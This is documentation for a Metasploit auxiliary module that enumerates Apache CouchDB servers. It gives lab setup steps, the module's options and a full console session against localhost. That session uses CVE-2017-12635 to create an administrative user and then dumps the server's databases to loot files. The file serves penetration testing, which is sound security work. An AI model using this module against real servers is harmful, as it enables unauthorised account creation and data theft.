adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
metasploit-gs/documentation/modules/auxiliary/scanner/couchdb/couchdb_enum.md
T
William Vu 3a726554e9 Fix review comments
2019-01-07 12:51:52 -06:00

97 lines
3.9 KiB
Markdown
Raw Blame History

## Vulnerable Application
Apache CouchDB is a nosql database server which communicates over HTTP. This module will enumerate the server and databases hosted on it.
The following was done on Ubuntu 16.04, and is largely base on [1and1.com](https://www.1and1.com/cloud-community/learn/database/couchdb/install-and-use-couchdb-on-ubuntu-1604/):
1. `sudo apt install software-properties-common`
2. `sudo add-apt-repository ppa:couchdb/stable`
3. `sudo apt update`
4. `sudo apt install couchdb`
5. Reconfigure couchdb to listen to all interfaces. Edit `/etc/couchdb/local.ini`. Under `[httpd]` add the following line: `bind_address = 0.0.0.0`
6. Restart the service: `sudo service couchdb restart`
## Verification Steps
1. Install and configure couchdb
2. Start msfconsole
3. Do: `auxiliary/scanner/couchdb/couchdb_enum`
4. Do: `run`
## Options
**SERVERINFO**
If set to `true`, the server info will also enumerated and set in msf's DB. Defaults to `false`.
**CREATEUSER**
If set to `true`, the server info will attempt to create an account in CouchDB using configured credentials (limited to CVE-2017-12635 conditions). Defaults to `false`.
## Scenarios
Dumping databases with `SERVERINFO` and `CREATEUSER` set:
```
msf5 > use auxiliary/scanner/couchdb/couchdb_enum
msf5 auxiliary(scanner/couchdb/couchdb_enum) > options
Module options (auxiliary/scanner/couchdb/couchdb_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
CREATEUSER false yes Create Administrative user
HttpPassword IJvoGDWAWzQo yes CouchDB Password
HttpUsername CQuXQnVwQAow yes CouchDB Username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
ROLES _admin yes CouchDB Roles
RPORT 5984 yes The target port (TCP)
SERVERINFO false yes Print server info
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /_all_dbs yes Path to list all the databases
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set serverinfo true
serverinfo => true
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set createuser true
createuser => true
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set verbose true
verbose => true
msf5 auxiliary(scanner/couchdb/couchdb_enum) > check
[+] 127.0.0.1:5984 - Found CouchDB version 2.1.0
[*] 127.0.0.1:5984 - The target appears to be vulnerable.
msf5 auxiliary(scanner/couchdb/couchdb_enum) > run
[+] 127.0.0.1:5984 - Found CouchDB version 2.1.0
[+] 127.0.0.1:5984 - User CQuXQnVwQAow created with password IJvoGDWAWzQo. Connect to http://127.0.0.1:5984/_utils/ to login.
[+] 127.0.0.1:5984 - {
"couchdb": "Welcome",
"version": "2.1.0",
"features": [
"scheduler"
],
"vendor": {
"name": "The Apache Software Foundation"
}
}
[*] 127.0.0.1:5984 - Enumerating Databases...
[+] 127.0.0.1:5984 - Databases:
[
"_global_changes",
"_replicator",
"_users"
]
[+] 127.0.0.1:5984 - File saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb.enum_790231.bin
[+] 127.0.0.1:5984 - _global_changes saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb._global__841794.bin
[+] 127.0.0.1:5984 - _replicator saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb._replica_022445.bin
[+] 127.0.0.1:5984 - _users saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb._users_671128.bin
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/couchdb/couchdb_enum) >
```
Reference in New Issue View Git Blame Copy Permalink